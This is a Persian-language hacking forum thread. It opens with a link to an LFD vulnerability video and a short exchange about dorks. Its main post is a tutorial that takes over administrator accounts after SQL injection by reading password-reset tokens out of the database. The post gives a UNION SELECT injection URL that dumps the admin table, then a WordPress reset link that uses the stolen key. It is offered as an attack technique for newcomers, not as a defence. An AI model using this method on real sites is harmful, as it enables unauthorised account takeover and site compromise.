**SafeMaster** · 11-21-2021, 08:27 PM

دانلود ویدئو آموزشی آسیب پذیری lfd
تمام توضیحات لازم در قالب یک فیلم آموزشی برای علاقه مندان به امنیت قرار گرفت .
سایتهای خودتونو امن کنید و آگاه باشید .

لینک دانلود

**Xpsaeed** · 02-09-2022, 12:41 AM

دورک‌ ها کلا میشن باگ sql injection ?

**SafeMaster** · 02-09-2022, 07:43 PM

نوشته اصلی توسط Xpsaeed نمایش پست ها

دورک‌ ها کلا میشن باگ sql injection ?

خیر دورک ها کلمات کلیدی هستند برای شناسایی آسیب پذیری های مختلف

**SafeMaster** · 03-26-2022, 02:12 PM

سلام عزیزان
در ادامه آموزش ها با شما عزیزان هستیم با یک ترفند کاربردی در حملات SQL injection

در برخی مواقع پس از حملات SQL Injection به پسورد های هش شده ای میرسیم که کرک کردن آنها مستلزم زمان و سخت افزار قدرتمند میباشد و گاهی اوقات این سایتها به دلیل عدم کرک پسورد رها میشوند و از فعالیت بر روی آنها نا امید میشوید .
در ادامه آموزش ها به شما ترفندی آموزش میدیهیم که به واسطه آن بتوانید از طریق حملات SQL INJECTION پسورد یوزر ها و مدیران را ریست کنید و پسورد جدید بر روی آن ست کنید .

یک سیستم محتوا را در نظر بگیرید :

در تمامی سیستم های مدیریت محتوا گزینه مهمی به نام Reset Password یا Frogot Password وجود دارد که کاربر در صورت فراموشی رمز عبور به واسطه این گزینه میتواند رمز اکانت خود را از طریق ایمیل یا نام کاربری و ... تغییر دهد . تمامی این داده ها داخل فیلد های مختلف در دیتابیس ذخیره شده است و فراخوانی اطلاعات از دیتابیس صورت میپذیرد .
بطور مثال این جدول مربوط به admin ها در یک سیستم مدیریت محتوا میباشد :

Databases==> admin table

reset_token	role	email	password	username	id
vqwwSPzf6OK6bUv42XPk	administrator	[email protected]	17e70dea710e1e61fbed16db1f74cd09	admin	1

site.com/news.php?id=1+union+select+1,group_concat(id,0x3a, password,0x3a,email,0x3a,role,0x3a,reset_token),3, 4,5,6,7,8+from+admin

ما به واسطه آسیب پذیری SQL توانستیم اطلاعات این جدول را بخوانیم ، اما نتوانستیم پسورد را کرک کنیم ! حالا چه باید کرد ؟

گزینه هایی با نام TOKEN یا KEY یا ... رکورد های جدول مدیران یا کاربران در سیستم های مدیریت محتوا وجود دارد که در صورت ریست پسورد توسط کاربر مقداری برای آن ساخته میشود و در دیتابیس قرار میگیرد تا کاربر با مراجعه به ایمیل خود برای بازیابی رمز و ساخت پسورد جدید تنها به واسطه آن TOKen or KEy پسورد خود را ریست پسورد کند حتما تاکنون در اینستاگرام یا فیس بوک و یا سایتهای وردپرسی خود به این گزینه دقت کرده باشید .

پس اگر رمز را کرک نکردید ابتدا با ایمیل یا نام کاربری ادمین پسورد را ریست کنید تا کد ساخته شود سپس به از طریق حملات SQL INJECTION دنبال فیلد مربوط به کد ریست پسورد بگردید و در نهایت کد را برای ریست پسورد لود کنید . همانند نمونه زیر که ریست پسورد به واسطه کلید ساخته شده در وردپرس است :

کد:

http://yourdomain/wp-login.php?action=rp&key=vqwwSPzf6OK6bUv42XPk

توابعی همانند user_activation_key و get_password_reset_key() پس از اقدام برای ریست پسورد کلید مربوط به ریست پسورد را ساخته و در فیلد reset_key مربوط به جدول wp-users جایگذاری میکند پس اگر دسترسی به پسورد میسر نبود میتوانید کد یا کلید مربوط به ریست پسورد را شناسایی کنیم و ریست پسورد را انجام دهیم.

در سیستم های مدیریت محتوا شخصی یا سایر سیستم ها اگر گزینه ریست پسورد در صفحه ادمین وجود داشت قطعا key وجود دارد و در درتابیس به دنبال آن بگردید برای پیدا کردن اپراتور لینک ریست پسورد یکبار عضو شوید و با ایمیل خودتان ریست پسورد را انجام دهید تا لینک مربوط به ریست پسورد را شناسایی کنید .

امیدوارم استفاده کرده باشید ، شاد و پیروز باشید .

اطلاعیه

تاپیک هکر های تازه وارد

نظر

نظر

نظر

نظر

نظر

نظر

نظر

نظر

نظر

نظر

نظر

نظر

نظر

نظر

نظر